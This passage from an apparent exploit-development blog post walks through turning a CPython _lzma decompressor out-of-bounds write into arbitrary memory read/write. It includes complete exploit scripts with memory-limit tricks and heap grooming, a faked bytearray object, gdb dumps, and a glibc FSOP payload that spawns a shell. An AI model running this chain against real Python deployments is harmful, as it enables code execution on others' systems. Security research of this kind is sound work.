As we’ve figured out, we need to catch the MemoryError that decompress will throw, then call decompress one more time with some input data which should get memcpy’d OOB. Let’s update our script to reflect this:

import resource
import lzma

# remember the original limits so we can restore them after the bug triggers
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
# only lower the soft limit: a lowered hard limit can't be raised again without privileges
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

# so our memory cap is very tight
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = None

try:
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 1)
except MemoryError:
    pass
finally:
    # restore our resources so we struggle less post-bug
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'A'*16, 1)

We now just step through our script in gdb and see what happens on the decompress calls! After falling through to the error block in the first call, we can check what our lzma_stream struct looks like, knowing that it doesn’t get cleared out properly:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
 → 0x7ffff7b264ed <decompress+041e> ret
...
gef➤  print *(lzma_stream *)0x7ffff7c2e468
$13 = {
  next_in = 0x7ffff6bda06c "\020J\022_%\"\024\377\017\276\226dwW*\3568\330&...,
  avail_in = 0x100054,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555e53b50,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

Now, let’s continue on to the second decompress call.

We of course pass the lzs->next_in != NULL check. Both avail_now and avail_total would come out negative (since input_buffer and input_buffer_size in d are 0), but they’re size_t, so they just… wrap around to enormous unsigned values. Neither of them is smaller than len, so both the PyMem_Realloc and memmove branches get skipped. We now land on the memcpy as expected!

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────── [0m[36marguments (guessed)[1m[38;5;240m ────[0m
memcpy@plt (
   [34m$rdi[39m = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00,
   [34m$rsi[39m = 0x00007ffff77e8c40 → [33m"AAAAAAAAAAAAAAAA"[39m,
   [34m$rdx[39m = 0x0000000000000010,
   [34m$rcx[39m = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00
)
[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1025[1m[38;5;240m ────[0m
 [1m[38;5;240m  1020[0m	[1m[38;5;240m         else if (avail_now < len) {[0m
 [1m[38;5;240m  1021[0m	[1m[38;5;240m             memmove(d->input_buffer, lzs->next_in,[0m
 [1m[38;5;240m  1022[0m	[1m[38;5;240m                     lzs->avail_in);[0m
 [1m[38;5;240m  1023[0m	[1m[38;5;240m             lzs->next_in = d->input_buffer;[0m
 [1m[38;5;240m  1024[0m	[1m[38;5;240m         }[0m
                 // [33mdata[39m=0x00007fffffff9ea0  →  [...]  →  [33m"AAAAAAAAAAAAAAAA"[39m, [33mlzs[39m=0x00007fffffff9ec0  →  [...]  →  0xff1422255f124a10
[32m → 1025[39m	[32m         memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);[39m
   1026	         lzs->avail_in += len;
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;

We will be writing to 0x7ffff6cda0c0, which is the boundary of the original buffer (since we compute next_in + avail_in), a clear OOB write. If we manage to get some sort of useful struct adjacent to the original buffer, then we’re golden in upgrading this OOB write to an arbitrary R/W!
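To make that arithmetic concrete, here is a small sketch that replays the pointer math with the values from the lzma_stream dump above. It assumes avail_now and avail_total are 64-bit size_t values, so the subtraction wraps instead of going negative; the helper name and the mask constant are made up for illustration and are not part of CPython.

```python
MASK64 = (1 << 64) - 1  # emulate 64-bit size_t wraparound (assumption: LP64 build)

def replay_input_buffer_math(input_buffer, input_buffer_size, next_in, avail_in, length):
    """Hypothetical helper: replay the avail_now / avail_total checks in decompress()."""
    avail_now = ((input_buffer + input_buffer_size) - (next_in + avail_in)) & MASK64
    avail_total = (input_buffer_size - avail_in) & MASK64
    return {
        "avail_now": avail_now,
        "avail_total": avail_total,
        "takes_realloc": avail_total < length,
        "takes_memmove": avail_total >= length and avail_now < length,
        "memcpy_dest": next_in + avail_in,
    }

# Values taken from the gdb dump: the stale stream state after the MemoryError,
# with d->input_buffer and d->input_buffer_size both zero.
result = replay_input_buffer_math(
    input_buffer=0,
    input_buffer_size=0,
    next_in=0x7ffff6bda06c,
    avail_in=0x100054,
    length=16,
)
print(hex(result["memcpy_dest"]))
print(result["takes_realloc"], result["takes_memmove"])
```

Both branch flags come out false, and the destination matches the $rdi value gef shows for the memcpy.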

Note: as I’m writing this post, for some reason this buffer is sitting in the pyheap (0x7ffff7600000 range) rather than the regular glibc heap (0x555555e51000 range). This pisses me off, because a large buffer like this should be landing in the glibc heap instead, and that is part of why the next few sections are so messy. Regardless, we cringe on.

Going Places

Yellow Swans are an interesting noise/ambient/drone/tape music project. Something I’m a big fan of is all of their alt names (the same way SPK or Foetus have hella alt names), all being some variation on D.* Yellow Swans. Drowner Yellow Swans, Dove Yellow Swans, Doorendoorslechte Yellow Swans… “Going Places” is easily their most popular work, and for good reason. Ethereal yet damning ambient soundscapes that swallow you whole.

Anyways, let’s try to upgrade our primitive.

Finer Memory Control

Right now, our memory exhaustion is being triggered by, well, dumb luck. We have just enough memory that malloc only fails at the specific block we want, and this quickly becomes extremely unreliable once you so much as sneeze on the code. Furthermore, we want to at least try to get our buffer to land in the pyheap rather than the glibc heap so that we have more structs to play with.

We start by shrinking down our LZMA compressed payload to a healthier 2kB. If we’re good, we can make this work. Since we also want adjacent structs, we should try something that is sort of, but not exactly (but maybe it actually is?), heap spraying: after shrinking our memory space, we spam objects until we hit our memory limit, then we pop a few, which ideally should be adjacent.

import resource
import lzma

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        # sprayyyy
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
# these should be side by side?
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))
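The throttling half of that script can be tried on its own. The sketch below assumes Linux (where RLIMIT_AS is enforced) and runs the experiment in a child interpreter so the limit never touches the parent process; the 512 MiB cap and the 2 GiB request are arbitrary numbers picked for illustration.

```python
import subprocess
import sys

# Code for the child interpreter: cap its address space, then over-allocate.
CHILD = r"""
import resource

soft, hard = resource.getrlimit(resource.RLIMIT_AS)
cap = 512 * 1024 * 1024
if hard != resource.RLIM_INFINITY:
    cap = min(cap, hard)  # the soft limit may not exceed the hard limit
resource.setrlimit(resource.RLIMIT_AS, (cap, hard))

try:
    bytearray(2 * 1024 * 1024 * 1024)  # far bigger than the cap
    print("allocated")
except MemoryError:
    print("MemoryError")
"""

proc = subprocess.run([sys.executable, "-c", CHILD], capture_output=True, text=True)
outcome = proc.stdout.strip()
print(outcome)
```

Keeping the hard limit untouched is what lets the exploit script raise the soft limit back up afterwards.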

We’re hitting another snag though. Remember the lzma_code calls in decompress_buf? That allocates a bunch of crap too, so now we keep hitting a premature MemoryError after a few iterations of it before we can even make it to our error block. After a bit of tinkering, however, an obvious solution came to me.

...
    if (lzret == LZMA_STREAM_END) {
        FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
        break;
    } else if (lzs->avail_out == 0) {
        /* Need to check lzs->avail_out before lzs->avail_in.
            Maybe lzs's internal state still have a few bytes
            can be output, grow the output buffer and continue
            if max_lengh < 0. */
        if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
            break;
        }
        if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
            goto error;
        }
...

If lzs->avail_out is 0x0 and the output buffer already holds max_length bytes, we will exit decompress_buf after just one lzma_code call. For some reason, we can call decompress with a max_length of… zero, which makes that condition true straight away. So that means we can get decompress_buf to exit early, reliably, making our memory conditions easier to hit. Wonderful! Our script now looks something like this:

import resource
import lzma
import os

import ctypes

def heap_addr(b: bytearray) -> int:
    buf = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(buf)

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}, {hex(heap_addr(c))}")
    print(f"Next thing at {hex(id(d))}, {hex(heap_addr(d))}")
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'\x00' + b'\xfd'*16, 1)
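The max_length=0 behaviour that the decompress(c, 0) call leans on can be checked in isolation, with no memory limit involved. This is a minimal sketch using a valid stream compressed on the fly (not the post's crafted payload); the variable names are only for illustration.

```python
import lzma

original = bytes(range(256)) * 64
compressed = lzma.compress(original)

dec = lzma.LZMADecompressor()

# max_length=0: the decompressor may consume input but must not return any output.
first = dec.decompress(compressed, 0)
eof_after_first = dec.eof
needs_input_after_first = dec.needs_input

# Default max_length=-1: drain whatever was buffered internally by the first call.
rest = dec.decompress(b"")

print(first, eof_after_first, needs_input_after_first, len(rest), dec.eof)
```

The first call returns nothing and leaves unconsumed input parked inside the decompressor, which is exactly the state the second call then builds on.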

I’m cheating a little bit in the exploit script with the ctypes crap, purely for debugging purposes. Creating a bytearray gives me a PyByteArrayObject that sits in the pyheap, whereas the memory that actually holds the data (and, more importantly, where the OOB write would occur) lives in the glibc heap, with only a pointer to it stored in the struct. So when calling id, you get the object’s address, while the byte data (the actually mutable crap) sits elsewhere (somehow, this is relevant later).
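The split between the object and its data is easy to see outside the exploit. A minimal sketch, assuming CPython (where id returns the object's address); buffer_addr is the same trick as heap_addr in the script, under a different, made-up name.

```python
import ctypes

def buffer_addr(b: bytearray) -> int:
    """Address of the bytearray's data buffer, via a temporary ctypes view."""
    view = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(view)

blob = bytearray(b"A" * 2048)

obj_addr = id(blob)             # address of the PyByteArrayObject header (CPython detail)
data_addr = buffer_addr(blob)   # address of the bytes it manages
peek = ctypes.string_at(data_addr, 8)

print(hex(obj_addr), hex(data_addr), peek)
```

The two addresses differ, and reading raw memory at data_addr gives back the contents of the bytearray.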

Running this script, we now see that we can get buffers that are kissing (the two data addresses are 0x920 bytes apart, which matches the 0x921 chunk size field, i.e. 0x920 plus the PREV_INUSE bit, visible in the dump):

gef➤  r ../../test4.py
Starting program: ~/cpython/build-debug/python ../../test4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 5310 fillers of size 2.0kB each
Original data at 0x7ffff76ccbe0, 0x555556ab9910
Next thing at 0x7ffff76ccc40, 0x555556aba230
Decompressor is at 0x7ffff77c8f40
...
gef➤  x/20gx 0x555556aba230-0x80
0x555556aba1b0:	0x0008808011910100	0xfb67c4b18c5a88ba
0x555556aba1c0:	0x5a59040000000002	0xfdfdfdfdfdfdfd00
0x555556aba1d0:	0xfdfdfdfdfdfdfdfd	0xddddddddddddddfd
0x555556aba1e0:	0xdddddddddddddddd	0x0000000000000921
0x555556aba1f0:	0xf108000000000000	0xfdfdfdfdfdfdfd72
0x555556aba200:	0xd908000000000000	0xfdfdfdfdfdfdfd6f
0x555556aba210:	0x0000000000000001	0x0000555555d3f060
0x555556aba220:	0x00000000000008b8	0xffffffffffffffff
0x555556aba230:	0x0000000000000000	0x0000000000000000
0x555556aba240:	0x0000000000000000	0x0000000000000000

Ok, two things:

This OOB write in its current state is not very useful. We are now overflowing into another allocated data-carrying region, not the PyByteArrayObject that would actually be relevant. Even if we corrupt the chunk headers, it would probably be really difficult to expand this into something useful, especially with a garbage collector in the way. It’s basically impossible to land our LZMA buffer in the pyheap while also fulfilling the memory exhaustion criteria, so we need to be more creative with our overwrite.
What the fuck is up with the fd and dd bytes? I didn’t put those there.

The Punishment for Using a Debug Build

Remember I said using a debug build is blasphemous? Here’s a quick excerpt from the Python documentation:

When Python is built in debug mode, the PyMem_SetupDebugHooks() function is called at the Python preinitialization to setup debug hooks on Python memory allocators to detect memory errors.

The PYTHONMALLOC environment variable can be used to install debug hooks on a Python compiled in release mode (ex: PYTHONMALLOC=debug).

The PyMem_SetupDebugHooks() function can be used to set debug hooks after calling PyMem_SetAllocator().

These debug hooks fill dynamically allocated memory blocks with special, recognizable bit patterns. Newly allocated memory is filled with the byte 0xCD (PYMEM_CLEANBYTE), freed memory is filled with the byte 0xDD (PYMEM_DEADBYTE). Memory blocks are surrounded by “forbidden bytes” filled with the byte 0xFD (PYMEM_FORBIDDENBYTE). Strings of these bytes are unlikely to be valid addresses, floats, or ASCII strings.

The purpose of this padding is so that developers can more easily catch these OOB bugs: the hooks check the forbidden bytes when a block is freed or resized, and a clobbered guard byte aborts the interpreter with a fatal error. This is actually incredibly useful and an amazing feature.
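The fill patterns from the documentation can be observed on any build by turning the hooks on with PYTHONMALLOC=debug. The sketch below is a rough illustration, not anything from the exploit: it assumes a 64-bit CPython, spawns a child interpreter with the hooks enabled, and peeks around a PyMem_Malloc block through ctypes. The block size of 16 is arbitrary.

```python
import os
import subprocess
import sys

# Child code: allocate through the hooked allocator and dump the bytes around it.
CHILD = r"""
import ctypes

malloc = ctypes.pythonapi.PyMem_Malloc
malloc.restype = ctypes.c_void_p
malloc.argtypes = [ctypes.c_size_t]
free = ctypes.pythonapi.PyMem_Free
free.restype = None
free.argtypes = [ctypes.c_void_p]

n = 16
p = malloc(n)
print(ctypes.string_at(p - 7, 7).hex())   # guard bytes just before the block
print(ctypes.string_at(p, n).hex())       # the fresh, untouched block itself
print(ctypes.string_at(p + n, 8).hex())   # guard bytes just after the block
free(p)
"""

env = dict(os.environ, PYTHONMALLOC="debug")
proc = subprocess.run([sys.executable, "-c", CHILD], env=env,
                      capture_output=True, text=True)
before, payload, after = proc.stdout.split()
print(before, payload, after)
```

The 0xfd runs on either side of the block are the same bytes that show up around the buffers in the gdb dump above.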

However, this also means that writing my exploit becomes slightly more annoying and whatever I write for this debug build will not work on a release build. Dammit! Let’s shift over to a release build and wrap up our exploit.

Actually Getting Arb R/W

Okay okay so. Let’s think about what a useful struct to overflow into would be. We want some pointers that we can overwrite…

When allocating a large list, the backing array (i.e. the actual region of memory which contains the pointers to the objects in the list) is thrown into the glibc heap, so if we can get that to kiss our bad buffer, then we might be able to make a list element point to a fake PyObject…

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) 
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

payload = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZd'
    + b'A'*(2048-32+10)
)

c = bytearray(
        payload
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

Notice how it took me this long to realise I could just scam my way with an LZMA header and a bunch of 0x41s since we’re prematurely axing the decompression. Well, this arrangement is just nice to get the backing array of d to be adjacent to the backing memory of c.

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 6165 fillers of size 2.0kB each
Original data at 0x7ffff75b67f0
Next thing at 0x7ffff779f500
Decompressor is at 0x7ffff773c1f0
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  x/8gx 0x7ffff75b67f0 <-- this is the PyByteArrayObject of c
0x7ffff75b67f0:	0x0000000000000001	0x0000555555c35fa0
0x7ffff75b6800:	0x000000000000080b	0x000000000000080b
0x7ffff75b6810:	0x0000555556b023b0	0x0000555556b023b0 <-- this is the backing array address
0x7ffff75b6820:	0x0000000000000000	0x0000555556b02390
gef➤  x/20gx 0x0000555556b023b0
0x555556b023b0:	0x0400005a587a37fd	0x0000000046b4d6e6 <-- our LZMA data is here
0x555556b023c0:	0x7df3b61f2144df1c	0x5a59040000000001
0x555556b023d0:	0x4141414141414164	0x4141414141414141
0x555556b023e0:	0x4141414141414141	0x4141414141414141
0x555556b023f0:	0x4141414141414141	0x4141414141414141
0x555556b02400:	0x4141414141414141	0x4141414141414141
0x555556b02410:	0x4141414141414141	0x4141414141414141
0x555556b02420:	0x4141414141414141	0x4141414141414141
0x555556b02430:	0x4141414141414141	0x4141414141414141
0x555556b02440:	0x4141414141414141	0x4141414141414141
gef➤  x/8gx 0x7ffff779f500 <-- this is the PyListObject of d
0x7ffff779f500:	0x0000000000000001	0x0000555555c47900
0x7ffff779f510:	0x0000000000000105	0x0000555556b02bd0 <-- this is the backing array address
0x7ffff779f520:	0x0000000000000105	0x00000000006e6f6d
0x7ffff779f530:	0x00007ffff779f431	0x00007ffff779f770
gef➤  x/20gx 0x0000555556b02bd0-0x40 <-- peeking a bit behind, we see they kiss <3
0x555556b02b90:	0x4141414141414141	0x4141414141414141
0x555556b02ba0:	0x4141414141414141	0x4141414141414141
0x555556b02bb0:	0x4141414141414141	0x0000000000414141
0x555556b02bc0:	0x0000000000000000	0x0000000000000831
0x555556b02bd0:	0x0000555555c7e860	0x0000555555c7e880
0x555556b02be0:	0x0000555555c7e8a0	0x0000555555c7e8c0
0x555556b02bf0:	0x0000555555c7e8e0	0x0000555555c7e900
0x555556b02c00:	0x0000555555c7e920	0x0000555555c7e940
0x555556b02c10:	0x0000555555c7e960	0x0000555555c7e980
0x555556b02c20:	0x0000555555c7e9a0	0x0000555555c7e9c0
gef➤

Now, we can overwrite from the end of our fake LZMA buffer into the backing array! We just need to make it point to a fake PyObject struct, and of course the most useful would be… a PyByteArrayObject! If we fake a struct that just starts at, like, 0x0 or something and has an obscene size, we basically get arbitrary R/W across the entire memory space.
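Before faking anything, it helps to pin down what sits between the end of the buffer and the first list slot, since the overwrite has to walk across it. The sketch below replays the numbers from the dump above; chunk_size is a simplified model of 64-bit glibc malloc rounding (8-byte size field, 16-byte alignment, 32-byte minimum), written for illustration rather than taken from glibc.

```python
def chunk_size(request: int) -> int:
    """Simplified 64-bit glibc chunk size: add the size field, round up to 16, min 32."""
    return max(32, (request + 8 + 15) & ~15)

PREV_INUSE = 0x1  # low bit of the size field

# d = [0] * (256 + 5): the backing array holds one 8-byte pointer per element.
list_len = 256 + 5
backing_bytes = list_len * 8
size_field = chunk_size(backing_bytes) | PREV_INUSE

# Addresses from the gdb dump.
buf_start = 0x555556B023B0      # data pointer of c
buf_len = 0x80B                 # ob_size of c
first_slot = 0x555556B02BD0     # backing array of d

buf_end = buf_start + buf_len
gap = first_slot - buf_end      # bytes to cross before reaching d[0]

print(hex(size_field), hex(buf_end), gap)
```

In this dump the gap is 21 bytes: 5 bytes of slack, the 8-byte prev_size field, and the 8-byte size field holding 0x831, which is the value that has to be written back intact. A buffer one byte shorter would leave 6 bytes of slack instead.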

Where can we put our fake struct? For some reason, when doing up the exploit for the first time, I thought it would be really smart to put it in the fake LZMA buffer, then using a separate heap leak I’d calculate the offset to it. This was extremely painful, thoughtless, and stupidly unreliable (even a single addition to the script would completely change the offset!). A quick set of texts with Lucas “samuzora” Tan showed me the error of my ways, thankfully (why even calculate an offset when you can just… use the payload position directly?).

So let’s get the following:

Our fake struct in the heap that we can get the heap address of, done by making a large bytes object (not a bytearray)
A PIE leak (trivially done by leaking id(int) and calculating the offset)
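The offset subtracted from id(int) is specific to one build, so it has to be measured once per binary. One way to do that on Linux, sketched here under the assumption that /proc/self/maps is readable and that the int type object lives in a file-backed mapping (the python executable or libpython); mapping_for is a made-up helper name.

```python
def mapping_for(addr: int, maps_path: str = "/proc/self/maps"):
    """Return (path, base) for the named mapping containing addr, or None."""
    entries = []
    with open(maps_path) as f:
        for line in f:
            fields = line.split(maxsplit=5)
            if len(fields) < 6:
                continue  # anonymous mapping, no pathname column
            start, end = (int(x, 16) for x in fields[0].split("-"))
            entries.append((start, end, fields[5].strip()))
    for start, end, path in entries:
        if start <= addr < end:
            # The load base is the lowest mapping that belongs to the same file.
            base = min(s for s, _, p in entries if p == path)
            return path, base
    return None

hit = mapping_for(id(int))
if hit is not None:
    path, base = hit
    offset = id(int) - base
    print(f"{path}: base={hex(base)}, id(int) - base = {hex(offset)}")
```

On the build used in this post that difference would be the 0x6f4680 constant; on any other build it will be a different number.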

Our script now looks like this:

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

faker = (
    b'd\x00\x00\x00\x00\x00\x00\x00'     # ob_refcnt (non-zero)
    + struct.pack("<q", id(bytearray))     # ob_type
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_size
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_alloc
    + struct.pack("<q", id(int)-0x6f4680)  # ob_bytes (buffer pointer, we do PIE base)
    + struct.pack("<q", id(int)-0x6f4680)  # ob_start (just keep it the same)
    + b'\x00\x00\x00\x00\x00\x00\x00\x00'  # ob_exports
    + b'A'*2048 # padding to fall into glibc heap
)

lzma_buffer = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZ'
    + b'A'*(2048-32+10)
)

c = bytearray(
        lzma_buffer
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}")
    print(f"Next thing at {hex(id(d))}")
    print(f'Fake struct at {hex(id(faker))}')
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
# this is our OOB write!
a = decompressor.decompress(
    b'\x00'*6 # padding between our kissing objects
    + struct.pack("<q", 0x0)
    + struct.pack("<q", 0x831) # do not fuck the glibc header
    + struct.pack("<q", id(faker)+0x20), # address of our fake struct, +0x20 to account for the header
1)

input(f"OOB Write done!, array will start at {hex(id(int)-0x6f4680)}")

print(d[0][:256])

If you’re wondering what’s up with the x and e arrays and why we’re putting the lzma_buffer in a bytearray before calling decompress on it… uh… I couldn’t tell you. That’s just bad code and bad experimentation. This script can definitely be cleaner. Running this, we see that all of that actually worked!

➜  build-release git:(480edc1aae0) ✗ ./python ../../test4_1.py
Allocated 6172 fillers of size 2.0kB each
Original data at 0x7f797ee6ab30
Next thing at 0x7f797f06b380
Fake struct at 0x55ded7e3d6a0
Decompressor is at 0x7f797eff81f0
MemError triggered, decompressing again
OOB Write done!, array will start at 0x55de9a8b6000
bytearray(b'\x7fELF\x02\x01\x01...')

Wonderful. We now have arbitrary read and write and can do whatever we want. Like a crappy FSOP payload with hardcoded offsets.

# gonna need to make it to GOT with this one
leak = (d[0][0x6e0038:0x6e0038+8])

libc_base = int.from_bytes(leak,'little')-0x89ae0
print('libc base: ', hex(libc_base))
print('stderr: ', hex(libc_base+0x1e84a0))

elf_base = id(int)-0x6f4680
stderr = libc_base+0x1e84a0
wfile_jumps = libc_base+0x1e6228
system = libc_base+0x53b00

p64 = lambda x: struct.pack('<Q', x)
input("pause...")

fsop = b''.join([
    b"  sh\x00\x00\x00\x00",            # 0x00: flags
    p64(0),                             # 0x08: _IO_read_ptr
    p64(0),                             # 0x10: _IO_read_end
    p64(0),                             # 0x18: _IO_read_base
    p64(0),                             # 0x20: _IO_write_base
    p64(1),                             # 0x28: _IO_write_ptr
    p64(0) * 7,                         # 0x30 - 0x60: write_end, buf_base... to markers
    p64(system),                   # 0x68: chain
    p64(0) * 3,                         # 0x70 - 0x80: fileno, old_offset, cur_column
    p64(stderr + 0x210),            # 0x88: _lock (needs to point to writable nulls)
    p64(0),                             # 0x90: _offset
    p64(stderr),                   # 0x98: _codecvt
    p64(stderr - 0x48),            # 0xa0: _wide_data
    p64(0) * 6,                         # 0xa8 - 0xd0: freeres, pad, mode, unused
    p64(wfile_jumps)               # 0xd8: vtable
])

print(d[0][stderr-elf_base:stderr-elf_base+64])
d[0][stderr-elf_base:stderr-elf_base+len(fsop)] = fsop

And we get a shell :)


Fig: Winner winner chicken dinner
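A side note on the FSOP blob: the offset comments only stay honest as long as nobody miscounts a p64(0) * n. A possible alternative, sketched here with a hypothetical flat helper and placeholder addresses (the real ones come from the leaks), is to key the payload by offset and zero-fill the rest.

```python
import struct

def flat(fields: dict, length: int) -> bytes:
    """Hypothetical helper: put 8-byte LE ints (or raw bytes) at offsets, zero-fill the rest."""
    out = bytearray(length)
    for offset, value in fields.items():
        raw = value if isinstance(value, bytes) else struct.pack("<Q", value)
        out[offset:offset + len(raw)] = raw
    return bytes(out)

# Placeholder addresses for illustration only.
stderr = 0x7F0000001000
system = 0x7F0000002000
wfile_jumps = 0x7F0000003000

fsop = flat({
    0x00: b"  sh",          # flags
    0x28: 1,                # _IO_write_ptr
    0x68: system,           # chain
    0x88: stderr + 0x210,   # _lock
    0x98: stderr,           # _codecvt
    0xA0: stderr - 0x48,    # _wide_data
    0xD8: wfile_jumps,      # vtable
}, length=0xE0)

print(len(fsop), fsop[:8])
```

With the same addresses plugged in, this produces the same 0xe0 bytes as the b''.join version above.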

Conclusion

Was this a difficult bug to exploit? Eh… the hard part was honestly finagling the memory to behave how we want since the OOB write primitive itself is quite obvious to get to. Once you get the OOB write, then it’s just a matter of knowing what to do with it since you’re sitting in the sad glibc heap rather than the cool epic pyheap (I wasted a lot of time trying to figure out how to land the LZMA buffer in the pyheap with the memory exhaustion criteria).

So what did I learn from this?

The Python debug build padding thing.
How to throttle Python script resources.
That’s about it, actually; the rest of the pwn stuff was neither complex nor novel to me.

Hopefully, you at least found this entertaining. Okay, ciao.